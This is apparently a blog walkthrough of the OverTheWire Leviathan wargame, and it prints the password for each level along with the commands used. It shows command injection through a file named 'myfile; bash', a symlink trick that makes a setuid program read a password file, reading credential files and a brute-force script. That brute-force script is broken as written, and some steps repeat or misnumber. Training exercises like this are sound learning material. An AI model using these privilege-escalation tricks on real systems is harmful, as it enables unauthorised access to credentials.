Leviathan Walkthrough
Level 0 >> Level 1
Hints
1. Since you don't have an explanatory question for this one. Try to ssh into the server and look for things which are designed in a way that people usually don't see it.
Solution
1. SSH into the server with password as leviathan0
$ ssh leviathan0@leviathan.labs.overthewire.org -p 2223
2. A simple ls into the server didn't gave any useful output. So lets try to see the hidden files in the directory
$ ls -a
OUTPUT: . .. .backup .bash_logout .bashrc .profile
3. Backup directory seems interesting. Lets cd into it and see its contents.
$ cd .backup && ls
OUTPUT: bookmarks.html
4. When I tried to view its contents using cat I realized that the file is too big to traverse manually. So I tried to grep random strings into it and found the answer with grep password
$ cat bookmarks.html | grep password
OUTPUT:
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>
6. Yay. Found the password for leviathan1
rioGegei8m
Level 1 >> Level 2
Hints
1. Try using ltrace
Solution
1. SSH into the server with password as rioGegei8m
$ ssh leviathan1@leviathan.labs.overthewire.org -p 2223
2. The first thing I saw upon ls into the directory is a check file.
3. So I used the file command to check its type
$ file check
4. It showed me that it is a ELF executable file. So I executed it.
$ ./check
OUTPUT: password:
5. It asked me for a password but I didn't had one so I tried a random string and as expected it was a wrong password.
6. Here I can use radare2 to interact with the file but thats a bit tedious and I have other ways in mind before trying it. So I used ltrace to check the libraries being used by the program in a home to find something useful.
$ ltrace ./check
OUTPUT: __libc_start_main(0x804853b, 1, 0xffffd784, 0x8048610
printf("password: ") = 10
getchar(1, 0, 0x65766f6c, 0x646f6700password: yoohoo
) = 121
getchar(1, 0, 0x65766f6c, 0x646f6700) = 111
getchar(1, 0, 0x65766f6c, 0x646f6700) = 111
strcmp("yoo", "sex") = 1
puts("Wrong password, Good Bye …"Wrong password, Good Bye …
) = 29
+++ exited (status 0) +++
7. The only useful info I was able to decipher from this is that it compared my given password with "sex" using the strcmp command.
8. So I ran the program again and provided it with sex as the password. It gave me a shell. I had a feeling that my privilege had just been escalated and to confirm it I ran whoami.
$ whoami
OUPUT: leviathan2
9. At this point the challenge is as good as completed. Then I went to the leviathan_pass directory and used cat to display the appropriate file.
$ cd /etc/leviathan_pass
$ cat leviathan2
OUTPUT: ougahZi8Ta
10. The password for leviathan2 is ougahZi8Ta
Level 2 >> Level 3
Solution
1. SSH into the server with password as rioGegei8m
$ ssh leviathan1@leviathan.labs.overthewire.org -p 2223
2. We'll ls into the directory and it gives us a file
OUTPUT: printfile
This is a setuid ELF 32-bit LSB executable and thus I ran it.
3. So I executed it and I had an idea that it will cat a file with elevated privileges.
4. Next I created a random file called myfile and passed it through the printfile while also using ltrace.
5. From its output I saw that /bin/cat %s is being executed where %s is replaced by my file name.
6. Finally I created a new file with the name "myfile; bash".
7. When I executed this file it reported the contents of myfile and also executed bash.
8. Executing a whoami gave me the access rights of leviathan3
9. Ending the challenge with a cat command onto the password file
$ cat /etc/leviathan_pass/leviathan3
OUTPUT: Ahdiemoo1j
10. The password for leviathan3 is Ahdiemoo1j
Level 3 >> Level 4
Hints
1. Use ltrace
Solution
1. SSH into the server with password as Ahdiemoo1j
$ ssh leviathan3@leviathan.labs.overthewire.org -p 2223
2. We'll ls into the directory and it gives us a file
OUTPUT: level3
This is a setuid ELF 32-bit LSB executable and thus I ran it.
3. It asked me for a password which I didn't had. But still I went for a random password and as expected it was a wrong password.
4. Then I ran ltrace onto it
$ ltrace ./level3
OUTPUT:
__libc_start_main(0x8048618, 1, 0xffffd784, 0x80486d0
strcmp("h0no33", "kakaka") = -1
printf("Enter the password> ") = 20
fgets(Enter the password> kakaka
"kakaka\n", 256, 0xf7fc55a0) = 0xffffd590
strcmp("kakaka\n", "snlprintf\n") = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
) = 19
+++ exited (status 0) +++
5. This gave me a strcmp function which could be used as a password. So I ran it again and supplied it with snlprintf as the password.
6. By doing this I had a shell. But it was of no use I as was still the user leviathan3. At this point I was super confused as I was definitely sure that I'll be leviathan4. But I wasn't.
7. I tried some things but nothing worked and out of frustation I ran level3 again with snlprintf as the password and again got a shell. But this time I wasn't leviathan3 anymore. The privileges have been escalated and I was leviathan4.
8. Then I simply used cat to get the password for leviathan4.
$ cat /etc/leviathan_pass/leviathan4
OUTPUT: vuH0coox6m
10. The password for leviathan4 is vuH0coox6m
Level 4 >> Level 5
Hints
1. Conversion is all there is to it. This one's super easy so try doing it without looking at the solution.
Solution
1. SSH into the server with password as vuH0coox6m
$ ssh leviathan4@leviathan.labs.overthewire.org -p 2223
2. We'll ls into the directory and it give us nothing.
3. So the next option was to look for hidden folders
$ ls -a
OUTPUT: .trash
4. It had an executable file inside it which gave me binary numbers.
$ cd .trash; ./bin
OUTPUT: 01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
5. Then I converted these binary numbers to ASCII and obtained the password
10. The password for leviathan5 is Tith4cokei
Level 5 >> Level 6
Hints
1. Symbolic links are the key.
Solution
1. SSH into the server with password as Tith4cokei
$ ssh leviathan5@leviathan.labs.overthewire.org -p 2223
2. The server provides us with an executable file called leviathan5 which asks for a particular file in /tmp upon its execution. So my first step was to create the file and add some data to it.
$ echo "hello" > /tmp/file.log
3. Now when I ran this file it printed its data written in the previous step.
$ ./leviathan5
OUTPUT: hello
4. Here I assumed that the file is being read with elevated privileges. So i created a symbolic link to the file.log with the password file of leviathan6.
$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
5. Now when I ran the program it provided me with the password for leviathan6.
$ ./leviathan5
OUTPUT: UgaoFee4li
6. The password for leviathan6 is UgaoFee4li
Level 6 >> Level 7
Hints
1. A simple script is needed.
Solution
1. SSH into the server with password as UgaoFee4li
$ ssh leviathan6@leviathan.labs.overthewire.org -p 2223
2. The server provides us with an executable file called leviathan6 which asks for a 4 digit password upon its execution.
3. The approach I'm gonna use is to make a script which will brute force this file. So in order to do that I first created a temporary directory.
$ mkdir /tmp/techno
4. Then I created a python file and executed it
nano script.py
import os
num = 1000
variable = ""
while num<1000 :
variable = "~/leviathan6 " + str(num)
print("Variable of num is %i", num)
os.system(variable)
num = num + 1
NOTE: I know the script is not perfect. I am not very good with python at this point so try to create your own for better understanding.
5. It provided me with the 4 digit password as 7123
6. Then I used it to execute the file leviathan6 which provided me with a new shell with the access privileges of leviathan7
7. Finally I extracted the password of leviathan7
$ cat /etc/leviathan_pass/leviathan7
OUTPUT: ahy7MaeBo9
6. The password for leviathan7 is ahy7MaeBo9 and congratulations you've completed the leviathan challenge.
Comments
Post a Comment